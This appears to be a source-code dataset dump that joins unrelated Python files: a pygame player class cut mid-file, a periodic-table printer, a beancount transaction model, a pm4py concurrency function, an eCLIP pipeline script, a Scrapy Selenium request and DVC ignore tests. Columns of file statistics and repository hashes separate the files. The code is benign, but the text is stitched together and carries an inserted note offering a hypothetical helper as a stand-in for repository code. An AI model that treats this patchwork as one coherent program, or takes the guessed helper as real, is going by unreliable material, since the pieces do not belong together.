        self.jumping_locked = False  # Used to lock the player from jumping again until they release the jump key
        self.current_gravity = 0     # The current gravity affecting the player
        self.jump_gravity = (2 * MAX_JUMP_HEIGHT) / (TIME_TO_JUMP_APEX ** 2)
        self.fall_gravity = self.jump_gravity * FALL_GRAVITY_MULTIPLIER
        self.jump_velocity = ((-2 * MAX_JUMP_HEIGHT) / TIME_TO_JUMP_APEX) - self.fall_gravity

        # Time
        self.coyote_timer = COYOTE_TIME            # Time the player has to jump after leaving the ground
        self.jump_buffer_timer = JUMP_BUFFER_TIME  # Registers jump input as long as this is less than JUMP_BUFFER_TIME
        self.last_frame_ticks = 0                  # Not used if using estimated delta_time (1/FPS)

    def process_input(self, events):
        """Process input events. This method is called by Level, which passes
        in the events from the main game loop."""
        for event in events:
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_LEFT:  # Move left
                    self.direction_x = -1
                if event.key == pygame.K_RIGHT:  # Move right
                    self.direction_x = 1
                if event.key == pygame.K_UP:  # Jump
                    self.jump_pressed = True
                if event.key == pygame.K_g:  # Invert gravity just for fun
                    self.fall_gravity = -self.fall_gravity
                    self.current_gravity = -self.current_gravity
            if event.type == pygame.KEYUP:
                if event.key == pygame.K_LEFT and self.direction_x < 0:
                    self.direction_x = 0
                if event.key == pygame.K_RIGHT and self.direction_x > 0:
                    self.direction_x = 0
                if event.key == pygame.K_UP:
                    self.jump_pressed = False
                    self.jumping_locked = False

    def check_jump_buffer(self):
        """Conditionally applies jumping force to the player."""
        self.update_jump_buffer_timer()
        # jump_allowed = not (self.jumps_remaining > 0 and
        #                     (self.is_grounded or self.is_jumping or
        #                      self.coyote_timer < COYOTE_TIME))
        jump_input = self.jump_buffer_timer < JUMP_BUFFER_TIME
        can_jump = not self.jumping_locked and self.jumps_remaining > 0 and (
            self.is_jumping or self.coyote_timer < COYOTE_TIME)
        self.jumping_locked = self.jump_pressed
        if jump_input and can_jump:
            self.jump()

    def jump(self):
        self.coyote_timer = COYOTE_TIME
        self.jump_buffer_timer = JUMP_BUFFER_TIME
        self.is_jumping = True
        self.jumps_remaining -= 1
        self.current_gravity = self.jump_gravity
        self.velocity.y = self.jump_velocity

    def update_air_timer(self):
        """Resets air timer if grounded, otherwise increments by delta time."""
        self.coyote_timer = 0 if self.is_grounded else round(self.coyote_timer + EST_DELTA_TIME, 2)

    def update_jump_buffer_timer(self):
        """Resets jump buffer timer if jump key pressed, otherwise increments by delta time."""
        self.jump_buffer_timer = 0 if self.jump_pressed and not self.jumping_locked else round(self.jump_buffer_timer + EST_DELTA_TIME, 2)

    def move(self):
        """Move the player and apply collisions."""
        self.velocity.y += self.current_gravity
        self.check_jump_buffer()  # Check if the player should jump this frame
        target_velocity = pygame.math.Vector2(self.direction_x * self.speed, self.velocity.y)
        self.velocity = utils.pygame_vector2_smooth_damp(self.velocity, target_velocity, SMOOTH_TIME, EST_DELTA_TIME)
        self.velocity.x = 0 if abs(self.velocity.x) < 2 * SMOOTH_TIME else self.velocity.x

        # Horizontal movement and collisions
        self.rect.x += self.velocity.x
        for sprite in self.collision_sprites.sprites():
            if not sprite.rect.colliderect(self.rect):
                continue
            # Right collision
            elif abs(self.rect.right - sprite.rect.left) < COLLISION_TOLERANCE and self.velocity.x > 0:
                self.rect.right = sprite.rect.left
            # Left collision
            elif abs(self.rect.left - sprite.rect.right) < COLLISION_TOLERANCE and self.velocity.x < 0:
                self.rect.left = sprite.rect.right
            self.velocity.x = 0
            break

        # Vertical movement and collisions
        # Since vertical movement can be potentially a lot faster than horizontal due to gravity,
        # we need to check for collisions as we go each frame, instead of after moving by the velocity.
        for i in range(abs(int(self.velocity.y))):
            collided = False
            self.rect.y += abs(self.velocity.y) / self.velocity.y
            for sprite in self.collision_sprites.sprites():
                if not sprite.rect.colliderect(self.rect):
                    continue
                # Bottom collision
                elif abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE and self.velocity.y > 0:
                    self.rect.bottom = sprite.rect.top
                # Top collision
                elif abs(self.rect.top - sprite.rect.bottom) < COLLISION_TOLERANCE and self.velocity.y < 0:
                    self.rect.top = sprite.rect.bottom
                self.velocity.y = 0
                collided = True
                break
            if collided:
                break

        # Set gravity to fall gravity scale if we're falling or not holding jump
        if (not self.is_grounded and
                (not self.jump_pressed or self.velocity.y > 0)):
            self.current_gravity = self.fall_gravity

    def set_grounded(self):
        """Moves the player down 1 pixel and checks for a collision."""
        self.rect.y += 1
        for sprite in self.collision_sprites.sprites():
            if sprite.rect.colliderect(self.rect):
                if not abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE:
                    continue
                self.is_grounded = True
                self.was_grounded = True
                self.is_jumping = False
                self.jumps_remaining = MAX_JUMPS
                break
            else:
                self.is_grounded = False
                left_ground_this_frame = self.was_grounded and not self.is_grounded
                if not left_ground_this_frame:
                    continue
                self.air_time_start = pygame.time.get_ticks()
                self.was_grounded = False
        self.rect.y -= 1

    def update(self):
        """Update the player."""
        self.update_air_timer()
        self.move()
        self.set_grounded()
        print(f"jumps_remaining: {self.jumps_remaining}")
        print(f"jump_locked: {self.jumping_locked}")

    # Zombie method, only used if I decide I need perfect delta time (should probably remove this...)
    def update_delta_time(self):
        """Update the delta time."""
        self.delta_time = (pygame.time.get_ticks() - self.last_frame_ticks) / 1000
        self.last_frame_ticks = pygame.time.get_ticks()
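move() relies on utils.pygame_vector2_smooth_damp, which is not shown here. A plausible stateless sketch matching the call signature above is frame-rate-independent exponential smoothing toward the target; this is an assumption, not the repo's actual helper:

import math
import pygame


def pygame_vector2_smooth_damp(current, target, smooth_time, delta_time):
    """Move `current` a frame-rate-independent fraction of the way to `target`.

    The remaining gap decays by a constant factor per unit time, so the feel
    stays stable across frame rates. (Hypothetical implementation.)
    """
    t = 1.0 - math.exp(-delta_time / smooth_time)  # interpolation factor in (0, 1)
    return current + (target - current) * t


# quick check: repeated calls converge on the target
v = pygame.math.Vector2(0, 0)
for _ in range(60):
    v = pygame_vector2_smooth_damp(v, pygame.math.Vector2(10, 0), 0.1, 1 / 60)
print(v)  # approaches Vector2(10, 0)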
48.491018
138
0.618177
1,053
8,098
4.573599
0.177588
0.049834
0.026993
0.023256
0.336379
0.259759
0.186669
0.155731
0.135797
0.053987
0
0.007611
0.302297
8,098
167
139
48.491018
0.844779
0.206594
0
0.239669
0
0
0.011487
0.006766
0
0
0
0
0
1
0.082645
false
0
0.024793
0
0.115702
0.016529
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4149b0929f392e8e110537d2266f990d4929d8f0
5,054
py
Python
periodic/table.py
moopet/pyriodic
5477934881db6a00f040b9ff3624d1eca9389f36
[ "MIT" ]
null
null
null
periodic/table.py
moopet/pyriodic
5477934881db6a00f040b9ff3624d1eca9389f36
[ "MIT" ]
null
null
null
periodic/table.py
moopet/pyriodic
5477934881db6a00f040b9ff3624d1eca9389f36
[ "MIT" ]
null
null
null
from colored import fg, bg, attr

from . import elements
from . import layouts


class PeriodicTableError(Exception):
    """Periodic Table exceptions."""
    pass


class PeriodicTable:
    """Periodic Table."""

    def __init__(self, **kwargs):
        self.color = kwargs["color"] if "color" in kwargs else False
        self.width = kwargs["width"] if "width" in kwargs else None
        self.elements = elements.elements
        self.layouts = layouts.layouts

    def colorize_symbol(self, symbol, show_number=False):
        """Get a pretty version of a symbol or number."""
        if symbol == " ":
            return " "
        symbol = symbol.lower().capitalize()
        text = f" {symbol:2} "
        if show_number:
            number = str(self.elements[symbol]["number"])
            text = f" {number:3}"
        if self.color:
            element_color = self.elements[symbol]["color"]
            contrast_color = "white"
            if element_color == "yellow":
                contrast_color = "yellow_1"
            background_color = bg(element_color)
            text_color = fg(contrast_color) if show_number else fg("black")
            reset = attr("reset")
            text = f"{background_color}{text_color}{text}{reset}"
        return text

    def render_info(self, symbol):
        """Print summary information for a particular element."""
        if symbol not in self.elements:
            raise PeriodicTableError("Symbol not found in the periodic table")
        if self.color:
            self.render_symbols([symbol])
        element = self.elements[symbol]
        print(f"Symbol: {symbol}")
        print(f"Name: {element['name']}")
        if "origin" in element:
            print(f"Origin of name: {element['origin']}")
        print(f"Series: {element['series'].capitalize()}")
        print(f"Atomic number: {element['number']}")
        print(f"Period: {element['period']}")
        if "group" in element:
            print(f"Group: {element['group']}")

    def render_table(self, layout="standard", show_grid=False):
        """Print the classic periodic table using current output configuration."""
        if layout not in self.layouts:
            raise PeriodicTableError(f"Unknown table layout '{layout}'")
        if show_grid:
            print(" " + self.layouts[layout]["grid"])
            print()
        period = 1
        for line in self.layouts[layout]["table"].splitlines():
            line = f" {line} "
            is_top_line = period == int(period)
            period += 0.5
            for symbol in self.elements:
                replacement = self.colorize_symbol(symbol, is_top_line)
                line = line.replace(f" {symbol:2} ", replacement)
            if show_grid:
                header = int(period) if period < 8 and is_top_line else ' '
                line = f"{header} {line}"
            if self.color:
                reset = attr('reset')
                for symbol in self.elements:
                    color = bg(self.elements[symbol]["color"])
                    pattern = f" {symbol:2} "
                    line = line.replace(pattern, f"{color}{pattern}{reset}")
            print(line)

    def render_symbols(self, symbols):
        """Print a list of symbols using current output configuration."""
        columns = int(self.width / 4)
        lines = [symbols[i:i + columns] for i in range(0, len(symbols), columns)]
        for line in lines:
            top = [self.colorize_symbol(symbol, show_number=True) for symbol in line]
            bottom = [self.colorize_symbol(symbol) for symbol in line]
            print("".join(top))
            print("".join(bottom))

    def get_solutions(self, word, recursing=False):
        """Find all permutations that can spell a word."""
        if not recursing:
            self.stack = []
            self.results = []
        word = word.lower()
        for symbol in self.elements:
            symbol = symbol.lower()
            if symbol == word:
                if self.stack not in self.results:
                    self.stack.append(symbol)
                    self.results.append(self.stack)
                    self.stack = self.stack[:-1]
                continue
            if symbol == word[:len(symbol)]:
                self.stack.append(symbol)
                self.get_solutions(word[len(symbol):], recursing=True)
                self.stack = self.stack[:-1]
        return sorted(self.results, key=self.get_solution_ranking)

    def get_solution_ranking(self, solution):
        """Score a solution based on length and number of repeated symbols."""
        return len(solution) + 100 * (len(solution) - len(set(solution)))

    def get_symbol_from_atomic_number(self, number):
        """Translate an atomic number into an element's symbol."""
        number = int(number)
        elements = self.elements
        matches = [e for e in elements if elements[e]["number"] == number]
        return matches[0] if matches else None
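A short usage sketch of the word-spelling search (assumes the package's elements and layouts data modules are importable; the word is arbitrary):

table = PeriodicTable(color=False, width=80)
for solution in table.get_solutions("genius"):
    print(solution)  # e.g. ['ge', 'ni', 'u', 's'] from Ge, Ni, U, S, ranked shortest-first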
30.630303
85
0.564899
580
5,054
4.843103
0.22931
0.04272
0.03204
0.01602
0.055892
0
0
0
0
0
0
0.004928
0.317372
5,054
164
86
30.817073
0.809275
0.085081
0
0.118812
0
0
0.113786
0.021444
0
0
0
0
0
1
0.079208
false
0.009901
0.029703
0
0.178218
0.118812
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4149c18516a466d5bd042367b350b07706f720b8
536
py
Python
data_model/transaction.py
chryoung/beancount_importer
664d4bf07d7b953afca4cf9fce7436c942390c52
[ "MIT" ]
2
2021-08-18T14:05:46.000Z
2021-09-24T07:44:23.000Z
data_model/transaction.py
chryoung/beancount_importer
664d4bf07d7b953afca4cf9fce7436c942390c52
[ "MIT" ]
1
2021-09-24T08:00:26.000Z
2021-10-07T10:45:28.000Z
data_model/transaction.py
chryoung/beancount_importer
664d4bf07d7b953afca4cf9fce7436c942390c52
[ "MIT" ]
null
null
null
from datetime import date
from enum import IntEnum


class TransactionDirection(IntEnum):
    EXPENSES = 0
    INCOME = 1


class Transaction:
    def __init__(self):
        self.will_import = True
        self.transaction_date = date.today()
        self.payee = ''
        self.description = ''
        self.amount = 0
        self.currency = ''
        self.bill_payment_account = ''
        self.direction = TransactionDirection.EXPENSES
        self.from_account = ''
        self.to_account = ''
        self.is_modified = False
23.304348
54
0.619403
56
536
5.732143
0.553571
0.102804
0
0
0
0
0
0
0
0
0
0.007916
0.29291
536
22
55
24.363636
0.83905
0
0
0
0
0
0
0
0
0
0
0
0
1
0.055556
false
0
0.166667
0
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
414dbeebee592b4e49d79aec901a1680c586b5fb
3,617
py
Python
ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py
Malekhy/ws2122-lspm
e4dc8b801d12f862b8ef536a0f125f346f085a00
[ "MIT" ]
1
2022-01-19T04:02:46.000Z
2022-01-19T04:02:46.000Z
ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py
Malekhy/ws2122-lspm
e4dc8b801d12f862b8ef536a0f125f346f085a00
[ "MIT" ]
1
2021-11-19T07:21:48.000Z
2021-11-19T07:21:48.000Z
ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py
Malekhy/ws2122-lspm
e4dc8b801d12f862b8ef536a0f125f346f085a00
[ "MIT" ]
1
2022-01-14T17:15:38.000Z
2022-01-14T17:15:38.000Z
'''
    This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).

    PM4Py is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    PM4Py is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
from enum import Enum

from pm4py.algo.discovery.dfg.adapters.pandas.df_statistics import get_concurrent_events_dataframe
from pm4py.util import exec_utils, constants, xes_constants
from typing import Optional, Dict, Any, Union, Tuple, List, Set
import pandas as pd


class Parameters(Enum):
    ACTIVITY_KEY = constants.PARAMETER_CONSTANT_ACTIVITY_KEY
    CASE_ID_KEY = constants.PARAMETER_CONSTANT_CASEID_KEY
    TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_TIMESTAMP_KEY
    START_TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_START_TIMESTAMP_KEY
    STRICT = "strict"


def apply(dataframe: pd.DataFrame, parameters: Optional[Dict[Union[str, Parameters], Any]] = None) -> Dict[Tuple[str, str], int]:
    """
    Gets the number of times for which two activities have been concurrent in the log

    Parameters
    --------------
    dataframe
        Pandas dataframe
    parameters
        Parameters of the algorithm, including:
        - Parameters.ACTIVITY_KEY => activity key
        - Parameters.CASE_ID_KEY => case id
        - Parameters.START_TIMESTAMP_KEY => start timestamp
        - Parameters.TIMESTAMP_KEY => complete timestamp
        - Parameters.STRICT => Determine if only entries that are strictly concurrent
          (i.e. the length of the intersection as real interval is > 0) should be obtained. Default: False

    Returns
    --------------
    ret_dict
        Dictionaries associating to a couple of activities (tuple) the number of times
        for which they have been executed in parallel in the log
    """
    if parameters is None:
        parameters = {}

    activity_key = exec_utils.get_param_value(Parameters.ACTIVITY_KEY, parameters, xes_constants.DEFAULT_NAME_KEY)
    case_id_glue = exec_utils.get_param_value(Parameters.CASE_ID_KEY, parameters, constants.CASE_CONCEPT_NAME)
    timestamp_key = exec_utils.get_param_value(Parameters.TIMESTAMP_KEY, parameters, xes_constants.DEFAULT_TIMESTAMP_KEY)
    start_timestamp_key = exec_utils.get_param_value(Parameters.START_TIMESTAMP_KEY, parameters, None)
    strict = exec_utils.get_param_value(Parameters.STRICT, parameters, False)

    concurrent_dataframe = get_concurrent_events_dataframe(dataframe, start_timestamp_key=start_timestamp_key,
                                                           timestamp_key=timestamp_key, case_id_glue=case_id_glue,
                                                           activity_key=activity_key, strict=strict)

    ret_dict0 = concurrent_dataframe.groupby([activity_key, activity_key + '_2']).size().to_dict()
    ret_dict = {}
    # assure to avoid problems with np.float64, by using the Python float type
    for el in ret_dict0:
        # avoid getting two entries for the same set of concurrent activities
        el2 = tuple(sorted(el))
        ret_dict[el2] = int(ret_dict0[el])

    return ret_dict
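A hypothetical usage sketch. Column names follow the XES defaults pm4py resolves above (case:concept:name, concept:name, time:timestamp); the start-timestamp column name and the log values are made up:

import pandas as pd

log = pd.DataFrame({
    'case:concept:name': ['c1', 'c1'],
    'concept:name': ['A', 'B'],
    'start_timestamp': pd.to_datetime(['2021-01-01 09:00', '2021-01-01 09:30']),
    'time:timestamp': pd.to_datetime(['2021-01-01 10:00', '2021-01-01 11:00']),
})
result = apply(log, parameters={Parameters.START_TIMESTAMP_KEY: 'start_timestamp'})
print(result)  # expected under these assumptions: {('A', 'B'): 1} - A and B overlap 09:30-10:00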
44.654321
129
0.709151
474
3,617
5.21308
0.367089
0.072845
0.048159
0.034399
0.22501
0.117766
0.049777
0.035613
0
0
0
0.006043
0.222284
3,617
80
130
45.2125
0.872378
0.431573
0
0
0
0
0.004169
0
0
0
0
0
0
1
0.034483
false
0
0.172414
0
0.448276
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4151c5c3dbe7d9b634bc3106ccbd1a50caa1fb1f
1,120
py
Python
pipeline.py
Overnickel/eclip
8c52160d4e4418b4b1e186f30b4e06491ada9c40
[ "MIT" ]
null
null
null
pipeline.py
Overnickel/eclip
8c52160d4e4418b4b1e186f30b4e06491ada9c40
[ "MIT" ]
null
null
null
pipeline.py
Overnickel/eclip
8c52160d4e4418b4b1e186f30b4e06491ada9c40
[ "MIT" ]
1
2020-03-05T23:58:04.000Z
2020-03-05T23:58:04.000Z
import os
import argparse
import yaml
import pprint
from easydict import EasyDict as edict

from download import download
from read_process import read_process
from de_analysis import de
from cancer import cancer


def parse_args():
    parser = argparse.ArgumentParser(description='eCLIP')
    parser.add_argument('--config', dest='config_file',
                        help='configuration filename',
                        default='configs.yml', type=str)
    return parser.parse_args()


def load_config(config_path):
    with open(config_path, 'r') as f:
        # an explicit Loader is required on modern PyYAML; the bare
        # yaml.load(f) in the original no longer runs there
        config = edict(yaml.load(f, Loader=yaml.SafeLoader))
    return config


def main():
    print('ECLIP data processing pipeline.')

    ## load config file
    args = parse_args()
    if args.config_file is None:
        raise Exception('no configuration file')
    config = load_config(args.config_file)
    pprint.PrettyPrinter(indent=2).pprint(config)

    ## download data
    download(config)

    ## reads processing
    read_process(config)

    ## differential expression analysis
    de(config)

    ## cancer
    cancer(config)


if __name__ == '__main__':
    main()
21.960784
57
0.677679
136
1,120
5.411765
0.441176
0.054348
0.038043
0
0
0
0
0
0
0
0
0.00116
0.230357
1,120
50
58
22.4
0.852668
0.077679
0
0
0
0
0.11546
0
0
0
0
0
0
1
0.09375
false
0
0.28125
0
0.4375
0.09375
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41528f11f89e17b45a8aaf9f472409371cd43c86
887
py
Python
finscraper/request.py
jmyrberg/finscraper
f90399a0c33247d3bb896ca987ef6f293609abe0
[ "MIT" ]
null
null
null
finscraper/request.py
jmyrberg/finscraper
f90399a0c33247d3bb896ca987ef6f293609abe0
[ "MIT" ]
24
2020-05-09T19:18:30.000Z
2020-11-21T22:47:39.000Z
finscraper/request.py
jmyrberg/finscraper
f90399a0c33247d3bb896ca987ef6f293609abe0
[ "MIT" ]
null
null
null
"""Module for custom Scrapy request components.""" from scrapy import Request class SeleniumCallbackRequest(Request): """Process request with given callback using Selenium. Args: selenium_callback (func or None, optional): Function that will be called with the chrome webdriver. The function should take in parameters (request, spider, driver) and return request, response or None. If None, driver will be used for fetching the page, and return is response. Defaults to None. """ def __init__(self, *args, selenium_callback=None, **kwargs): meta = kwargs.pop('meta', {}) or {} if 'selenium_callback' not in meta: meta['selenium_callback'] = selenium_callback new_kwargs = dict(**kwargs, meta=meta) super(SeleniumCallbackRequest, self).__init__(*args, **new_kwargs)
36.958333
77
0.668546
105
887
5.504762
0.52381
0.138408
0.069204
0
0
0
0
0
0
0
0
0
0.24239
887
23
78
38.565217
0.860119
0.491545
0
0
0
0
0.092457
0
0
0
0
0
0
1
0.125
false
0
0.125
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41533ac389ddcc893deaa3a3dea233e8a8c4234c
12,254
py
Python
tests/func/test_ignore.py
farizrahman4u/dvc
a56c8bbab662c3792ae12aa7db6c40a42a23de50
[ "Apache-2.0" ]
1
2020-08-12T22:51:45.000Z
2020-08-12T22:51:45.000Z
tests/func/test_ignore.py
farizrahman4u/dvc
a56c8bbab662c3792ae12aa7db6c40a42a23de50
[ "Apache-2.0" ]
null
null
null
tests/func/test_ignore.py
farizrahman4u/dvc
a56c8bbab662c3792ae12aa7db6c40a42a23de50
[ "Apache-2.0" ]
1
2020-11-28T11:47:48.000Z
2020-11-28T11:47:48.000Z
import os
import shutil

import pytest

from dvc.exceptions import DvcIgnoreInCollectedDirError
from dvc.ignore import (
    DvcIgnore,
    DvcIgnoreDirs,
    DvcIgnorePatterns,
    DvcIgnorePatternsTrie,
    DvcIgnoreRepo,
)
from dvc.path_info import PathInfo
from dvc.repo import Repo
from dvc.tree.local import LocalRemoteTree
from dvc.utils import relpath
from dvc.utils.fs import get_mtime_and_size
from tests.dir_helpers import TmpDir


def test_ignore(tmp_dir, dvc, monkeypatch):
    tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}


def test_ignore_unicode(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"other": "text", "тест": "проверка"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/тест")
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}


def test_rename_ignored_file(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "ignored*")
    dvc.tree.__dict__.pop("dvcignore", None)

    mtime, size = get_mtime_and_size("dir", dvc.tree)

    shutil.move("dir/ignored", "dir/ignored_new")

    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)

    assert new_mtime == mtime and new_size == size


def test_rename_file(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
    mtime, size = get_mtime_and_size("dir", dvc.tree)

    shutil.move("dir/foo", "dir/foo_new")

    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
    assert new_mtime != mtime and new_size == size


def test_remove_ignored_file(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)

    mtime, size = get_mtime_and_size("dir", dvc.tree)

    os.remove("dir/ignored")

    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)

    assert new_mtime == mtime and new_size == size


def test_remove_file(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
    mtime, size = get_mtime_and_size("dir", dvc.tree)

    os.remove("dir/foo")

    new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
    assert new_mtime != mtime and new_size != size


def test_dvcignore_in_out_dir(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"foo": "foo", DvcIgnore.DVCIGNORE_FILE: ""}})

    with pytest.raises(DvcIgnoreInCollectedDirError):
        dvc.add("dir")


@pytest.mark.parametrize("dname", ["dir", "dir/subdir"])
def test_ignore_collecting_dvcignores(tmp_dir, dvc, dname):
    tmp_dir.gen({"dir": {"subdir": {}}})

    top_ignore_file = (tmp_dir / dname).with_name(DvcIgnore.DVCIGNORE_FILE)
    top_ignore_file.write_text(os.path.basename(dname))
    dvc.tree.__dict__.pop("dvcignore", None)

    ignore_file = tmp_dir / dname / DvcIgnore.DVCIGNORE_FILE
    ignore_file.write_text("foo")

    assert len(dvc.tree.dvcignore.ignores) == 3
    assert DvcIgnoreDirs([".git", ".hg", ".dvc"]) in dvc.tree.dvcignore.ignores
    ignore_pattern_trie = None
    for ignore in dvc.tree.dvcignore.ignores:
        if isinstance(ignore, DvcIgnorePatternsTrie):
            ignore_pattern_trie = ignore

    assert ignore_pattern_trie is not None
    assert (
        DvcIgnorePatterns.from_files(
            os.fspath(top_ignore_file),
            LocalRemoteTree(None, {"url": dvc.root_dir}),
        )
        == ignore_pattern_trie[os.fspath(ignore_file)]
    )

    assert any(
        i for i in dvc.tree.dvcignore.ignores if isinstance(i, DvcIgnoreRepo)
    )


def test_ignore_on_branch(tmp_dir, scm, dvc):
    tmp_dir.scm_gen({"foo": "foo", "bar": "bar"}, commit="add files")

    with tmp_dir.branch("branch", new=True):
        tmp_dir.scm_gen(DvcIgnore.DVCIGNORE_FILE, "foo", commit="add ignore")

    dvc.tree.__dict__.pop("dvcignore", None)
    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path)) == {
        path / "foo",
        path / "bar",
    }

    dvc.tree = scm.get_tree("branch", use_dvcignore=True)
    assert set(dvc.tree.walk_files(path)) == {
        os.fspath(path / DvcIgnore.DVCIGNORE_FILE),
        os.fspath(path / "bar"),
    }


def test_match_nested(tmp_dir, dvc):
    tmp_dir.gen(
        {
            ".dvcignore": "*.backup\ntmp",
            "foo": "foo",
            "tmp": "...",
            "dir": {"x.backup": "x backup", "tmp": "content"},
        }
    )
    dvc.tree.__dict__.pop("dvcignore", None)

    result = {os.fspath(os.path.normpath(f)) for f in dvc.tree.walk_files(".")}
    assert result == {".dvcignore", "foo"}


def test_ignore_external(tmp_dir, scm, dvc, tmp_path_factory):
    tmp_dir.gen(".dvcignore", "*.backup\ntmp")
    ext_dir = TmpDir(os.fspath(tmp_path_factory.mktemp("external_dir")))
    ext_dir.gen({"y.backup": "y", "tmp": "ext tmp"})

    result = {relpath(f, ext_dir) for f in dvc.tree.walk_files(ext_dir)}
    assert result == {"y.backup", "tmp"}


def test_ignore_subrepo(tmp_dir, scm, dvc):
    tmp_dir.gen({".dvcignore": "foo", "subdir": {"foo": "foo"}})
    scm.add([".dvcignore"])
    scm.commit("init parent dvcignore")
    dvc.tree.__dict__.pop("dvcignore", None)

    subrepo_dir = tmp_dir / "subdir"
    assert not dvc.tree.exists(PathInfo(subrepo_dir / "foo"))

    with subrepo_dir.chdir():
        subrepo = Repo.init(subdir=True)
        scm.add(str(subrepo_dir / "foo"))
        scm.commit("subrepo init")

    for _ in subrepo.brancher(all_commits=True):
        assert subrepo.tree.exists(PathInfo(subrepo_dir / "foo"))


def test_ignore_blank_line(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "foo\n\ndir/ignored")
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)

    assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}


# It is not possible to re-include a file if a parent directory of
# that file is excluded.
# Git doesn't list excluded directories for performance reasons,
# so any patterns on contained files have no effect,
# no matter where they are defined.
@pytest.mark.parametrize(
    "data_struct, pattern_list, result_set",
    [
        (
            {"dir": {"subdir": {"not_ignore": "121"}}},
            ["subdir/*", "!not_ignore"],
            {os.path.join("dir", "subdir", "not_ignore")},
        ),
        (
            {"dir": {"subdir": {"should_ignore": "121"}}},
            ["subdir", "!should_ignore"],
            set(),
        ),
        (
            {"dir": {"subdir": {"should_ignore": "121"}}},
            ["subdir/", "!should_ignore"],
            set(),
        ),
    ],
)
def test_ignore_file_in_parent_path(
    tmp_dir, dvc, data_struct, pattern_list, result_set
):
    tmp_dir.gen(data_struct)
    tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "\n".join(pattern_list))
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / relpath for relpath in result_set
    }


# If there is a separator at the end of the pattern then the pattern
# will only match directories,
# otherwise the pattern can match both files and directories.
# For example, a pattern doc/frotz/ matches doc/frotz directory,
# but not a/doc/frotz directory;
def test_ignore_sub_directory(tmp_dir, dvc):
    tmp_dir.gen(
        {
            "dir": {
                "doc": {"fortz": {"b": "b"}},
                "a": {"doc": {"fortz": {"a": "a"}}},
            }
        }
    )
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "doc/fortz"}})
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / "a" / "doc" / "fortz" / "a",
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }


# however frotz/ matches frotz and a/frotz that is a directory
def test_ignore_directory(tmp_dir, dvc):
    tmp_dir.gen({"dir": {"fortz": {}, "a": {"fortz": {}}}})
    tmp_dir.gen({"dir": {DvcIgnore.DVCIGNORE_FILE: "fortz"}})
    dvc.tree.__dict__.pop("dvcignore", None)

    path = PathInfo(tmp_dir)
    assert set(dvc.tree.walk_files(path / "dir")) == {
        path / "dir" / DvcIgnore.DVCIGNORE_FILE,
    }


